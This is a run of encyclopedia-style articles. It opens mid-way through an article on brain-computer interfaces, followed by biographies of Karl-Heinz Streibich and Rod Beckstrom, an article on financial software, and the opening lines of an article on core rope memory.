In 2011, researchers reported a cellular based BCI with the capability of taking EEG data and converting it into a command to cause the phone to ring. This research was supported in part by Abraxis Bioscience LLP, the U.S. Army Research Laboratory, and the Army Research Office. The developed technology was a wearable system composed of a four channel bio-signal acquisition/amplification module, a wireless transmission module, and a Bluetooth enabled cell phone. The electrodes were placed so that they pick up steady state visual evoked potentials (SSVEPs). SSVEPs are electrical responses to flickering visual stimuli with repetition rates over 6 Hz that are best found in the parietal and occipital scalp regions of the visual cortex. It was reported that with this BCI setup, all study participants were able to initiate the phone call with minimal practice in natural environments.
The scientists claim that their studies using a single channel fast Fourier transform (FFT) and multiple channel system canonical correlation analysis (CCA) algorithm support the capacity of mobile BCIs. The CCA algorithm has been applied in other experiments investigating BCIs with claimed high performance in accuracy as well as speed. While the cellular based BCI technology was developed to initiate a phone call from SSVEPs, the researchers said that it can be translated for other applications, such as picking up sensorimotor mu/beta rhythms to function as a motor-imagery based BCI.
In 2013, comparative tests were performed on android cell phone, tablet, and computer based BCIs, analyzing the power spectrum density of resultant EEG SSVEPs. The stated goals of this study, which involved scientists supported in part by the U.S. Army Research Laboratory, were to "increase the practicability, portability, and ubiquity of an SSVEP-based BCI, for daily use". Citation It was reported that the stimulation frequency on all mediums was accurate, although the cell phone's signal demonstrated some instability. The amplitudes of the SSVEPs for the laptop and tablet were also reported to be larger than those of the cell phone. These two qualitative characterizations were suggested as indicators of the feasibility of using a mobile stimulus BCI.
Limitations
In 2011, researchers stated that continued work should address ease of use, performance robustness, reducing hardware and software costs.
One of the difficulties with EEG readings is the large susceptibility to motion artifacts. In most of the previously described research projects, the participants were asked to sit still, reducing head and eye movements as much as possible, and measurements were taken in a laboratory setting. However, since the emphasized application of these initiatives had been in creating a mobile device for daily use, the technology had to be tested in motion.
In 2013, researchers tested mobile EEG-based BCI technology, measuring SSVEPs from participants as they walked on a treadmill at varying speeds. This research was supported by the Office of Naval Research, Army Research Office, and the U.S. Army Research Laboratory. Stated results were that as speed increased the SSVEP detectability using CCA decreased. As independent component analysis (ICA) had been shown to be efficient in separating EEG signals from noise, the scientists applied ICA to CCA extracted EEG data. They stated that the CCA data with and without ICA processing were similar. Thus, they concluded that CCA independently demonstrated a robustness to motion artifacts that indicates it may be a beneficial algorithm to apply to BCIs used in real world conditions.
Prosthesis and environment control
Non-invasive BCIs have also been applied to enable brain-control of prosthetic upper and lower extremity devices in people with paralysis. For example, Gert Pfurtscheller of Graz University of Technology and colleagues demonstrated a BCI-controlled functional electrical stimulation system to restore upper extremity movements in a person with tetraplegia due to spinal cord injury. Between 2012 and 2013, researchers at the University of California, Irvine demonstrated for the first time that it is possible to use BCI technology to restore brain-controlled walking after spinal cord injury. In their spinal cord injury research study, a person with paraplegia was able to operate a BCI-robotic gait orthosis to regain basic brain-controlled ambulation.
In 2009 Alex Blainey, an independent researcher based in the UK, successfully used the Emotiv EPOC to control a 5 axis robot arm. He then went on to make several demonstration mind controlled wheelchairs and home automation that could be operated by people with limited or no motor control such as those with paraplegia and cerebral palsy.
Research into military use of BCIs funded by DARPA has been ongoing since the 1970s. The current focus of research is user-to-user communication through analysis of neural signals.
DIY and open source BCI
In 2001, The OpenEEG Project was initiated by a group of DIY neuroscientists and engineers. The ModularEEG was the primary device created by the OpenEEG community; it was a 6-channel signal capture board that cost between $200 and $400 to make at home. The OpenEEG Project marked a significant moment in the emergence of DIY brain-computer interfacing.
In 2010, the Frontier Nerds of NYU's ITP program published a thorough tutorial titled How To Hack Toy EEGs. The tutorial, which stirred the minds of many budding DIY BCI enthusiasts, demonstrated how to create a single channel at-home EEG with an Arduino and a Mattel Mindflex at a very reasonable price. This tutorial amplified the DIY BCI movement.
In 2013, OpenBCI emerged from a DARPA solicitation and subsequent Kickstarter campaign. They created a high-quality, open-source 8-channel EEG acquisition board, known as the 32bit Board, that retailed for under $500. Two years later they created the first 3D-printed EEG Headset, known as the Ultracortex, as well as a 4-channel EEG acquisition board, known as the Ganglion Board, that retailed for under $100.
MEG and MRI
Magnetoencephalography (MEG) and functional magnetic resonance imaging (fMRI) have both been used successfully as non-invasive BCIs. In a widely reported experiment, fMRI allowed two users being scanned to play Pong in real-time by altering their haemodynamic response or brain blood flow through biofeedback techniques.
fMRI measurements of haemodynamic responses in real time have also been used to control robot arms with a seven-second delay between thought and movement.
In 2008 research developed in the Advanced Telecommunications Research (ATR) Computational Neuroscience Laboratories in Kyoto, Japan, allowed the scientists to reconstruct images directly from the brain and display them on a computer in black and white at a resolution of 10x10 pixels. The article announcing these achievements was the cover story of the journal Neuron of 10 December 2008.
In 2011 researchers from UC Berkeley published a study reporting second-by-second reconstruction of videos watched by the study's subjects, from fMRI data. This was achieved by creating a statistical model relating visual patterns in videos shown to the subjects, to the brain activity caused by watching the videos. This model was then used to look up the 100 one-second video segments, in a database of 18 million seconds of random YouTube videos, whose visual patterns most closely matched the brain activity recorded when subjects watched a new video. These 100 one-second video extracts were then combined into a mashed-up image that resembled the video being watched.
BCI control strategies in neurogaming
Motor imagery
Motor imagery involves the imagination of the movement of various body parts resulting in sensorimotor cortex activation, which modulates sensorimotor oscillations in the EEG. This can be detected by the BCI to infer a user's intent. Motor imagery typically requires a number of sessions of training before acceptable control of the BCI is acquired. These training sessions may take a number of hours over several days before users can consistently employ the technique with acceptable levels of precision. Regardless of the duration of the training session, users are unable to master the control scheme. This results in very slow pace of the gameplay. Advanced machine learning methods were recently developed to compute a subject-specific model for detecting the performance of motor imagery. The top performing algorithm from BCI Competition IV dataset 2 for motor imagery is the Filter Bank Common Spatial Pattern, developed by Ang et al. from A*STAR, Singapore).
Bio/neurofeedback for passive BCI designs
Biofeedback is used to monitor a subject's mental relaxation. In some cases, biofeedback does not monitor electroencephalography (EEG), but instead bodily parameters such as electromyography (EMG), galvanic skin resistance (GSR), and heart rate variability (HRV). Many biofeedback systems are used to treat certain disorders such as attention deficit hyperactivity disorder (ADHD), sleep problems in children, teeth grinding, and chronic pain. EEG biofeedback systems typically monitor four different bands (theta: 4–7 Hz, alpha:8–12 Hz, SMR: 12–15 Hz, beta: 15–18 Hz) and challenge the subject to control them. Passive BCI involves using BCI to enrich human–machine interaction with implicit information on the actual user's state, for example, simulations to detect when users intend to push brakes during an emergency car stopping procedure. Game developers using passive BCIs need to acknowledge that through repetition of game levels the user's cognitive state will change or adapt. Within the first play
of a level, the user will react to things differently from during the second play: for example, the user will be less surprised at an event in the game if he/she is expecting it.
Visual evoked potential (VEP)
A VEP is an electrical potential recorded after a subject is presented with a type of visual stimuli. There are several types of VEPs.
Steady-state visually evoked potentials (SSVEPs) use potentials generated by exciting the retina, using visual stimuli modulated at certain frequencies. SSVEP's stimuli are often formed from alternating checkerboard patterns and at times simply use flashing images. The frequency of the phase reversal of the stimulus used can be clearly distinguished in the spectrum of an EEG; this makes detection of SSVEP stimuli relatively easy. SSVEP has proved to be successful within many BCI systems. This is due to several factors, the signal elicited is measurable in as large a population as the transient VEP and blink movement and electrocardiographic artefacts do not affect the frequencies monitored. In addition, the SSVEP signal is exceptionally robust; the topographic organization of the primary visual cortex is such that a broader area obtains afferents from the central or fovial region of the visual field. SSVEP does have several problems however. As SSVEPs use flashing stimuli to infer a user's intent, the user must gaze at one of the flashing or iterating symbols in order to interact with the system. It is, therefore, likely that the symbols could become irritating and uncomfortable to use during longer play sessions, which can often last more than an hour which may not be an ideal gameplay.
Another type of VEP used with applications is the P300 potential. The P300 event-related potential is a positive peak in the EEG that occurs at roughly 300 ms after the appearance of a target stimulus (a stimulus for which the user is waiting or seeking) or oddball stimuli. The P300 amplitude decreases as the target stimuli and the ignored stimuli grow more similar.The P300 is thought to be related to a higher level attention process or an orienting response using P300 as a control scheme has the advantage of the participant only having to attend limited training sessions. The first application to use the P300 model was the P300 matrix. Within this system, a subject would choose a letter from a grid of 6 by 6 letters and numbers. The rows and columns of the grid flashed sequentially and every time the selected "choice letter" was illuminated the user's P300 was (potentially) elicited. However, the communication process, at approximately 17 characters per minute, was quite slow. The P300 is a BCI that offers a discrete selection rather than a continuous control mechanism. The advantage of P300 use within games is that the player does not have to teach himself/herself how to use a completely new control system and so only has to undertake short training instances, to learn the gameplay mechanics and basic use of the BCI paradigm.
Synthetic telepathy/silent communication
In a $6.3million US Army initiative to invent devices for telepathic communication, Gerwin Schalk, underwritten in a $2.2 million grant, found the use of ECoG signals can discriminate the vowels and consonants embedded in spoken and imagined words, shedding light on the distinct mechanisms associated with production of vowels and consonants, and could provide the basis for brain-based communication using imagined speech.
In 2002 Kevin Warwick had an array of 100 electrodes fired into his nervous system in order to link his nervous system into the Internet to investigate enhancement possibilities. With this in place Warwick successfully carried out a series of experiments. With electrodes also implanted into his wife's nervous system, they conducted the first direct electronic communication experiment between the nervous systems of two humans.
Another group of researchers was able to achieve conscious brain-to-brain communication between two people separated by a distance using non-invasive technology that was in contact with the scalp of the participants. The words were encoded by binary streams using the sequences of 0's and 1's by the imaginary motor input of the person "emitting" the information. As the result of this experiment, pseudo-random bits of the information carried encoded words "hola" ("hi" in Spanish) and "ciao" ("goodbye" in Italian) and were transmitted mind-to-mind between humans separated by a distance, with blocked motor and sensory systems, which has low to no probability of this happening by chance.
Research into synthetic telepathy using subvocalization is taking place at the University of California, Irvine under lead scientist Mike D'Zmura. The first such communication took place in the 1960s using EEG to create Morse code using brain alpha waves. Using EEG to communicate imagined speech is less accurate than the invasive method of placing an electrode between the skull and the brain. On 27 February 2013 the group with Miguel Nicolelis at Duke University and IINN-ELS successfully connected the brains of two rats with electronic interfaces that allowed them to directly share information, in the first-ever direct brain-to-brain interface.
Cell-culture BCIs
Researchers have built devices to interface with neural cells and entire neural networks in cultures outside animals. As well as furthering research on animal implantable devices, experiments on cultured neural tissue have focused on building problem-solving networks, constructing basic computers and manipulating robotic devices. Research into techniques for stimulating and recording from individual neurons grown on semiconductor chips is sometimes referred to as neuroelectronics or neurochips.
Development of the first working neurochip was claimed by a Caltech team led by Jerome Pine and Michael Maher in 1997. The Caltech chip had room for 16 neurons.
In 2003 a team led by Theodore Berger, at the University of Southern California, started work on a neurochip designed to function as an artificial or prosthetic hippocampus. The neurochip was designed to function in rat brains and was intended as a prototype for the eventual development of higher-brain prosthesis. The hippocampus was chosen because it is thought to be the most ordered and structured part of the brain and is the most studied area. Its function is to encode experiences for storage as long-term memories elsewhere in the brain.
In 2004 Thomas DeMarse at the University of Florida used a culture of 25,000 neurons taken from a rat's brain to fly a F-22 fighter jet aircraft simulator. After collection, the cortical neurons were cultured in a petri dish and rapidly began to reconnect themselves to form a living neural network. The cells were arranged over a grid of 60 electrodes and used to control the pitch and yaw functions of the simulator. The study's focus was on understanding how the human brain performs and learns computational tasks at a cellular level.
Collaborative BCIs
The idea of combining/integrating brain signals from multiple individuals was introduced at Humanity+ @Caltech, in December 2010, by a Caltech researcher at JPL, Adrian Stoica; Stoica referred to the concept as multi-brain aggregation. A provisional patent application was filed on January 19, 2011, with the non-provisional patent following one year later. In May 2011, Yijun Wang and Tzyy-Ping Jung published, “A Collaborative Brain-Computer Interface for Improving Human Performance", and in January 2012 Miguel Eckstein published, “Neural decoding of collective wisdom with multi-brain computing”. Stoica's first paper on the topic appeared in 2012, after the publication of his patent application. Given the timing of the publications between the patent and papers, Stoica, Wang & Jung, and Eckstein independently pioneered the concept, and are all considered as founders of the field. Later, Stoica would collaborate with University of Essex researchers, Riccardo Poli and Caterina Cinel. The work was continued by Poli and Cinel, and their students: Ana Matran-Fernandez, Davide Valeriani, and Saugat Bhattacharyya.
Ethical considerations
Sources:
User-centric issues
Long-term effects to the user remain largely unknown.
Obtaining informed consent from people who have difficulty communicating.
The consequences of BCI technology for the quality of life of patients and their families.
Health-related side-effects (e.g. neurofeedback of sensorimotor rhythm training is reported to affect sleep quality).
Therapeutic applications and their potential misuse.
Safety risks
Non-convertibility of some of the changes made to the brain
Legal and social
Issues of accountability and responsibility: claims that the influence of BCIs overrides free will and control over sensory-motor actions, claims that cognitive intention was inaccurately translated due to a BCI malfunction.
Personality changes involved caused by deep-brain stimulation.
Concerns regarding the state of becoming a "cyborg" - having parts of the body that are living and parts that are mechanical.
Questions personality: what does it mean to be a human?
Blurring of the division between human and machine and inability to distinguish between human vs. machine-controlled actions.
Use of the technology in advanced interrogation techniques by governmental authorities.
Selective enhancement and social stratification.
Questions of research ethics regarding animal experimentation
Questions of research ethics that arise when progressing from animal experimentation to application in human subjects.
Moral questions
Mind reading and privacy.
Tracking and "tagging system"
Mind control.
Movement control
Emotion control
In their current form, most BCIs are far removed from the ethical issues considered above. They are actually similar to corrective therapies in function. Clausen stated in 2009 that "BCIs pose ethical challenges, but these are conceptually similar to those that bioethicists have addressed for other realms of therapy". Moreover, he suggests that bioethics is well-prepared to deal with the issues that arise with BCI technologies. Haselager and colleagues pointed out that expectations of BCI efficacy and value play a great role in ethical analysis and the way BCI scientists should approach media. Furthermore, standard protocols can be implemented to ensure ethically sound informed-consent procedures with locked-in patients.
The case of BCIs today has parallels in medicine, as will its evolution. Similar to how pharmaceutical science began as a balance for impairments and is now used to increase focus and reduce need for sleep, BCIs will likely transform gradually from therapies to enhancements. Efforts are made inside the BCI community to create consensus on ethical guidelines for BCI research, development and dissemination. As innovation continues, ensuring equitable access to BCIs will be crucial, failing which generational inequalities can arise which can adversely affect the right to human flourishing.
The ethical considerations of BCIs are essential to the development of future implanted devices. End-users, ethicists, researchers, funding agencies, physicians, corporations, and all others involved in BCI use should consider the anticipated, and unanticipated, changes that BCIs will have on human autonomy, identity, privacy, and more.
Low-cost BCI-based interfaces
Recently a number of companies have scaled back medical grade EEG technology to create inexpensive BCIs for research as well as entertainment purposes. For example, toys such as the NeuroSky and Mattel MindFlex have seen some commercial success.
In 2006 Sony patented a neural interface system allowing radio waves to affect signals in the neural cortex.
In 2007 NeuroSky released the first affordable consumer based EEG along with the game NeuroBoy. This was also the first large scale EEG device to use dry sensor technology.
In 2008 OCZ Technology developed a device for use in video games relying primarily on electromyography.
In 2008 Final Fantasy developer Square Enix announced that it was partnering with NeuroSky to create a game, Judecca.
In 2009 Mattel partnered with NeuroSky to release the Mindflex, a game that used an EEG to steer a ball through an obstacle course. It is by far the best selling consumer based EEG to date.
In 2009 Uncle Milton Industries partnered with NeuroSky to release the Star Wars Force Trainer, a game designed to create the illusion of possessing the Force .
In 2009 Emotiv released the EPOC, a 14 channel EEG device that can read 4 mental states, 13 conscious states, facial expressions, and head movements. The EPOC is the first commercial BCI to use dry sensor technology, which can be dampened with a saline solution for a better connection.
In November 2011 Time magazine selected "necomimi" produced by Neurowear as one of the best inventions of the year. The company announced that it expected to launch a consumer version of the garment, consisting of catlike ears controlled by a brain-wave reader produced by NeuroSky, in spring 2012.
In February 2014 They Shall Walk (a nonprofit organization fixed on constructing exoskeletons, dubbed LIFESUITs, for paraplegics and quadriplegics) began a partnership with James W. Shakarji on the development of a wireless BCI.
In 2016, a group of hobbyists developed an open-source BCI board that sends neural signals to the audio jack of a smartphone, dropping the cost of entry-level BCI to £20. Basic diagnostic software is available for Android devices, as well as a text entry app for Unity.
In 2020, NextMind released a dev kit including an EEG headset with dry electrodes at $399. The device can be played with some demo applications or developers can create their own use cases using the provided Software Development Kit.
Future directions
A consortium consisting of 12 European partners has completed a roadmap to support the European Commission in their funding decisions for the new framework program Horizon 2020. The project, which was funded by the European Commission, started in November 2013 and published a roadmap in April 2015. A 2015 publication led by Dr. Clemens Brunner describes some of the analyses and achievements of this project, as well as the emerging Brain-Computer Interface Society. For example, this article reviewed work within this project that further defined BCIs and applications, explored recent trends, discussed ethical issues, and evaluated different directions for new BCIs.
Other recent publications too have explored future BCI directions for new groups of disabled users (e.g.,
Disorders of consciousness (DOC)
Some persons have a disorder of consciousness (DOC). This state is defined to include persons with coma, as well as persons in a vegetative state (VS) or minimally conscious state (MCS). New BCI research seeks to help persons with DOC in different ways. A key initial goal is to identify patients who are able to perform basic cognitive tasks, which would of course lead to a change in their diagnosis. That is, some persons who are diagnosed with DOC may in fact be able to process information and make important life decisions (such as whether to seek therapy, where to live, and their views on end-of-life decisions regarding them). Some persons who are diagnosed with DOC die as a result of end-of-life decisions, which may be made by family members who sincerely feel this is in the patient's best interests. Given the new prospect of allowing these patients to provide their views on this decision, there would seem to be a strong ethical pressure to develop this research direction to guarantee that DOC patients are given an opportunity to decide whether they want to live.
These and other articles describe new challenges and solutions to use BCI technology to help persons with DOC. One major challenge is that these patients cannot use BCIs based on vision. Hence, new tools rely on auditory and/or vibrotactile stimuli. Patients may wear headphones and/or vibrotactile stimulators placed on the wrists, neck, leg, and/or other locations. Another challenge is that patients may fade in and out of consciousness, and can only communicate at certain times. This may indeed be a cause of mistaken diagnosis. Some patients may only be able to respond to physicians' requests during a few hours per day (which might not be predictable ahead of time) and thus may have been unresponsive during diagnosis. Therefore, new methods rely on tools that are easy to use in field settings, even without expert help, so family members and other persons without any medical or technical background can still use them. This reduces the cost, time, need for expertise, and other burdens with DOC assessment. Automated tools can ask simple questions that patients can easily answer, such as "Is your father named George?" or "Were you born in the USA?" Automated instructions inform patients that they may convey yes or no by (for example) focusing their attention on stimuli on the right vs. left wrist. This focused attention produces reliable changes in EEG patterns that can help determine that the patient is able to communicate. The results could be presented to physicians and therapists, which could lead to a revised diagnosis and therapy. In addition, these patients could then be provided with BCI-based communication tools that could help them convey basic needs, adjust bed position and HVAC (heating, ventilation, and air conditioning), and otherwise empower them to make major life decisions and communicate.
Motor recovery
People may lose some of their ability to move due to many causes, such as stroke or injury. Research in recent years has demonstrated the utility of EEG-based BCI systems in aiding motor recovery and neurorehabilitation in patients who have suffered a stroke. Several groups have explored systems and methods for motor recovery that include BCIs. In this approach, a BCI measures motor activity while the patient imagines or attempts movements as directed by a therapist. The BCI may provide two benefits: (1) if the BCI indicates that a patient is not imagining a movement correctly (non-compliance), then the BCI could inform the patient and therapist; and (2) rewarding feedback such as functional stimulation or the movement of a virtual avatar also depends on the patient's correct movement imagery.
So far, BCIs for motor recovery have relied on the EEG to measure the patient's motor imagery. However, studies have also used fMRI to study different changes in the brain as persons undergo BCI-based stroke rehab training. Imaging studies combined with EEG-based BCI systems hold promise for investigating neuroplasticity during motor recovery post-stroke. Future systems might include the fMRI and other measures for real-time control, such as functional near-infrared, probably in tandem with EEGs. Non-invasive brain stimulation has also been explored in combination with BCIs for motor recovery. In 2016, scientists out of the University of Melbourne published preclinical proof-of-concept data related to a potential brain-computer interface technology platform being developed for patients with paralysis to facilitate control of external devices such as robotic limbs, computers and exoskeletons by translating brain activity. Clinical trials are currently underway.
Functional brain mapping
Each year, about 400,000 people undergo brain mapping during neurosurgery. This procedure is often required for people with tumors or epilepsy that do not respond to medication. During this procedure, electrodes are placed on the brain to precisely identify the locations of structures and functional areas. Patients may be awake during neurosurgery and asked to perform certain tasks, such as moving fingers or repeating words. This is necessary so that surgeons can remove only the desired tissue while sparing other regions, such as critical movement or language regions. Removing too much brain tissue can cause permanent damage, while removing too little tissue can leave the underlying condition untreated and require additional neurosurgery. Thus, there is a strong need to improve both methods and systems to map the brain as effectively as possible.
In several recent publications, BCI research experts and medical doctors have collaborated to explore new ways to use BCI technology to improve neurosurgical mapping. This work focuses largely on high gamma activity, which is difficult to detect with non-invasive means. Results have led to improved methods for identifying key areas for movement, language, and other functions. A recent article addressed advances in functional brain mapping and summarizes a workshop.
Flexible devices
Flexible electronics are polymers or other flexible materials (e.g. silk, pentacene, PDMS, Parylene, polyimide) that are printed with circuitry; the flexible nature of the organic background materials allowing the electronics created to bend, and the fabrication techniques used to create these devices resembles those used to create integrated circuits and microelectromechanical systems (MEMS). Flexible electronics were first developed in the 1960s and 1970s, but research interest increased in the mid-2000s.
Flexible neural interfaces have been extensively tested in recent years in an effort to minimize brain tissue trauma related to mechanical mismatch between electrode and tissue. Minimizing tissue trauma could, in theory, extend the lifespan of BCIs relying on flexible electrode-tissue interfaces.
Neural dust
Neural dust is a term used to refer to millimeter-sized devices operated as wirelessly powered nerve sensors that were proposed in a 2011 paper from the University of California, Berkeley Wireless Research Center, which described both the challenges and outstanding benefits of creating a long lasting wireless BCI. In one proposed model of the neural dust sensor, the transistor model allowed for a method of separating between local field potentials and action potential "spikes", which would allow for a greatly diversified wealth of data acquirable from the recordings.
See also
Informatics
AlterEgo, a system that reads unspoken verbalizations and responds with bone-conduction headphones
Augmented learning
Biological machine
Cortical implants
Deep brain stimulation
Human senses
Kernel (neurotechnology company)
Lie detection
Microwave auditory effect
Neural engineering
Neuralink
Neurorobotics
Neurostimulation
Nootropic
Project Cyborg
Simulated reality
Telepresence
Thought identification
Whole brain emulation
Notes
References
Further reading
Brouse, Andrew. "A Young Person's Guide to Brainwave Music: Forty years of audio from the human EEG". eContact! 14.2 – Biotechnological Performance Practice / Pratiques de performance biotechnologique (July 2012). Montréal: CEC.
Gupta, Cota Navin and Ramaswamy Palanappian. "Using High-Frequency Electroencephalogram in Visual and Auditory-Based Brain-Computer Interface Designs". eContact! 14.2 – Biotechnological Performance Practice / Pratiques de performance biotechnologique (July 2012). Montréal: CEC.
Ouzounian, Gascia. "The Biomuse Trio in Conversation: An Interview with R. Benjamin Knapp and Eric Lyon". eContact! 14.2 – Biotechnological Performance Practice / Pratiques de performance biotechnologique (July 2012). Montréal: CEC.
External links
The Unlock Project
DARPA projects
Human–computer interaction
Implants (medicine)
User interface techniques
Virtual reality
|
29649210
|
https://en.wikipedia.org/wiki/Karl-Heinz%20Streibich
|
Karl-Heinz Streibich
|
Karl-Heinz Streibich (born 1952) is a German manager who served as chairman of the executive board and chief executive officer of the Germany-based software company Software AG from 2003 until 2018. Prior to that he was deputy chairman and deputy chief executive officer of T-Systems
Early life and education
Streibich was born in Germany. He holds a degree in communications engineering from the Offenburg University, Germany.
Career
Streibich started his career in 1981 at Dow Chemical Company in Rheinmünster, Germany, as a software development engineer. Three years later he joined ITT Industries as product marketing manager then moved to ITT-SEL AG now Alcatel-Lucent as managing director of the PC business. He joined Daimler Benz AG in 1989, where he served several IT-related executive positions before serving as deputy chairman and deputy chief executive officer of Debis Systemhaus facilitating the merger with T-Systems between 2000 and 2002. He is a member of the supervisory board (Aufsichtsrat) at Deutsche Messe AG, and holds several honorary positions, including member of the presidency of the German IT Association BITKOM, co-chairman of the platform “Digital administration and public IT“ within the framework of the German Chancellor's IT summit, and he is a co-founder of the German Software Cluster of Excellence.
From 2003 until 2018 Streibich served as chairman of the executive board and chief executive officer of the Germany-based software company Software AG. In this capacity, he was also responsible for the company's corporate marketing, audit, processes & quality, legal affairs, and corporate communications. Under his leadership, Software AG acquired webMethods for $546 million in cash to add networking software to its product line.
Streibich is the author of the book entitled The Digital Enterprise, published in 2014.
Other activities
Corporate boards
Software AG, Member of the Supervisory Board (since 2020)
Munich Re, Member of the Supervisory Board (since 2019)
Siemens Healthineers, Member of the Supervisory Board (since 2018)
Dürr AG, Member of the Supervisory Board (2011-2020), Chairman of the Supervisory Board (2018-2020)
Wittenstein, Member of the Supervisory Board (2017-2019)
Deutsche Messe, Member of the Supervisory Board (2013-2017)
Non-profit organizations
German Cancer Research Center (DKFZ), Member of the Advisory Council
Senckenberg Nature Research Society, Member of the Board of Trustees
References
1952 births
Living people
Businesspeople from Hesse
Software AG
|
10198560
|
https://en.wikipedia.org/wiki/Rod%20Beckstrom
|
Rod Beckstrom
|
Rod Beckstrom (born February 1961) is an American author, high-tech entrepreneur, and former CEO and President of ICANN. He previously served as Director of the National Cybersecurity Center.
Education and early work
Beckstrom received his BA with Honors and Distinction and an MBA from Stanford University, where he served as the Chairman of the Council of Presidents of the Associated Students of Stanford University.
In August 2007, Beckstrom and Peter Thoeny, author of TWiki co-launched TWIKI.NET, a Web 2.0 company that supports TWiki, an open source wiki. Beckstrom became Chairman and Chief Catalyst. He was also co-founder, Chairman and CEO of CATS Software Inc., a derivatives and risk management software company which went public on NASDAQ and later was sold to Misys PLC.
Author
He is co-author of the best-selling book The Starfish And the Spider, which lays out a new organizational theory for considering all organizations as existing on a continuum between centralized to decentralized, with different implications and strategies for each firm based upon their position on that axis. In interviews with The Washington Post and USA Today, Beckstrom explains how, using the 'Starfish' concept illustrated in The Starfish And the Spider, the U.S. Government can take a different approach in their dealings with Al-Qaeda. Beckstrom is also the formulator of an economic model for valuing networks, Beckstrom's law, which was presented at BlackHat 2009 and Defcon 2009.
Beckstrom, a pioneer in the field of derivatives trading and firm-wide risk management, was coached by Nobel Laureate William F. Sharpe, which resulted in the first book on a new theory, "Value at Risk."
National Cyber Security Center
On March 20, 2008, Beckstrom was appointed to run the newly created National Cybersecurity Center, a position requiring "advanced thought leadership in areas like coordination, collaboration and team work in order to best serve the mission".
On March 5, 2009, less than a year after the position was created, he stated that he would resign as the Director of the National Cybersecurity Center (NCSC) on Friday, March 13, 2009. He has recommended the Deputy Director Mary Ellen Seale as his successor. He stated that a lack of cooperation from the NSA and insufficient funding led to his resignation. He stated that he received $500,000 which funded five weeks of operation. He has stated that he supports a more decentralized approach and opposes the NSA's move to try to "rule over" the NCSC.
Presidency of ICANN
On 25 June 2009, at its 35th meeting in Sydney, Australia, the Board of ICANN resolved to appoint Rod Beckstrom as its CEO and President. At ICANN, he presided over a number of notable developments, including the 15 July 2010 DNSSEC signing of the DNS root, and the 20 June 2011 opening of the gTLD namespace to additional applicants. On July 1, 2012 he was succeeded as CEO by ICANN's COO as CEO pro tem who served in that capacity until Beckstrom's permanent replacement Fadi Chehade was able to take up his position on 1 October 2012.
Investor
Rod Beckstrom is the lead angel investor in the Encino, CA-based software development company American Legalnet Inc.
Volunteer work
An active participant in the non-profit arena, Beckstrom serves on the board of trustees of Environmental Defense Fund, an organization involved in designing, advocating and implementing environmental policy solutions, such as the Kyoto Protocol and the California Climate Act. He is also a trustee of Jamii Bora Trust, a micro-lending group with 170,000 members, based in Nairobi.
References
External links
Living people
Businesspeople in information technology
American foreign policy writers
American male non-fiction writers
George W. Bush administration personnel
1961 births
|
41667831
|
https://en.wikipedia.org/wiki/Financial%20software
|
Financial software
|
Financial software or financial system software is special application software that records all the financial activity within a business organization. Basic features of this system not only includes all the modules of accounting software like accounts payable, accounts receivable, ledger, reporting modules and payroll but also to explore alternative investment choices and calculate statistical relationships. Features of the system may vary depending on what type of business it is being used for. Primarily, the goal of the financial software is to record, categorize, analyze, compile, interpret and then present an accurate and updated financial dates for every transaction of the business.
Features of financial software
Pipeline tracking
Pipeline tracking is one of the key features of an accounting system and software for asset management. This provides summarized information on all the details pertaining to the potential investments that are being monitored. The system and software will organize the pipeline and record the source, execution status, approval status, feasible investment capital and the targeted purchase price. It provides an efficient analysis of the best deals, timing and price for the utilization of the investment team. Pipeline tracking provides tracking of the source, history and status. It also provides customized classifications and categories. The system can easily execute a cash flow model and create return assumptions.
Asset management
Asset management is another important feature of a financial software. It uses the updated status of the investment to provide the necessary tools in creating every possible outcome, such as future payments that are distressed, conversions for debt to equity and maturity of loans. It also provides an efficient tracking of payment dates and rates. Updated financial statements are readily available, which makes it very easy to determine credit standing and as a result make proper adjustments on the projections. Asset management can modify dates of payment, conversion of floating to fixed rates, deferred payments, interest rates, maturity extensions and change schedules for repayment. It also uses various assumptions to store and run multiple cases such as downside, base and upside.
Fund management
The next feature is fund management, which provides an accurate projection of all the investments as well as factors of the borrowing and operating cost of the fund in order to create a view of the cash levels in the future and investment returns. This system aids in the evaluation and structuring of any fund. Fund management provides a combination of the projections of the cash flow on all investments in order to create a monthly summary. It provides customized assumptions on the leverage cost, interest income, taxes and expenses. The system also creates several scenarios concerning the cash allocation such as reinvestments, distribution of investors and fresh investments. It also creates an analysis of the leverage and call of the capital. Income statements and anticipated balance sheets can also be efficiently created with the use of the system.
Data warehousing
Another feature of the financial software, is the data warehousing. This feature syncs the accounting system and retrieves investment transactions. It also uses a customizable category or name. This key feature allows an effortless re-categorization of the investments. The calculation of investment statistics will depend on the computation of the user at any given moment. Customized reports on the performance of the investment can be created using any of the calculations programmed in the database of the system. There are approximately more than 100 various calculations programmed in the system. If there is a need for more calculations, then it can easily be provided for the user. Several investments can be categorized into subgroups or groups and they will be used for the creation of totals. It identifies the total price of the fixed income in comparison to the equity investments.
Uses of financial software
Use in pipeline tracking
Pipeline tracking has multiple benefits and one of them is that it provides a standard layout for possible deals. It also detects the deals that have been approved but are still awaiting execution. It provides an accurate comparison of the cost of investment with the expected returns. The system can easily provide a recycle plan for investment opportunities. It also creates a manifold portfolio with potential returns by utilizing information on the target industries or regions. Pipeline tracking speeds up the decision-making of the committee for financial investment.
Use in fund management
There are many benefits of the fund management feature of the financial software. Fund management can determine which specific investments are creating returns. It also pinpoints the availability or shortage of cash. It provides an evaluation of the leverage options as well as determines the effect on the returns. The system also creates a central and systematic modelling, management and analysis of the funds.
Use in asset managements
The benefits of asset management include the creation of a platform for maintaining the projection of cash flow on investments. Excel models also eliminate the possibility of manual errors. Asset management increases the scale and adds investments without the loss of analytic perspective. Through this software managers of portfolios have a better grasp on the performance level of the investment. It also provides accurate information on whether the prediction of the analysts was close to the actual performance of the investment.
See also
Accounting software
Application software
References
|
575923
|
https://en.wikipedia.org/wiki/Core%20rope%20memory
|
Core rope memory
|
Core rope memory is a form of read-only memory (ROM) for computers, first used in the 1960s by early NASA Mars space probes and then in the Apollo Guidance Computer (AGC) and programmed by the Massachusetts Institute of Technology (MIT) Instrumentation Lab and built by Raytheon.
Software written by MIT programmers was woven into core rope memory by female workers in factories. Some programmers nicknamed the finished product LOL memory, for Little Old Lady memory.
Memory density
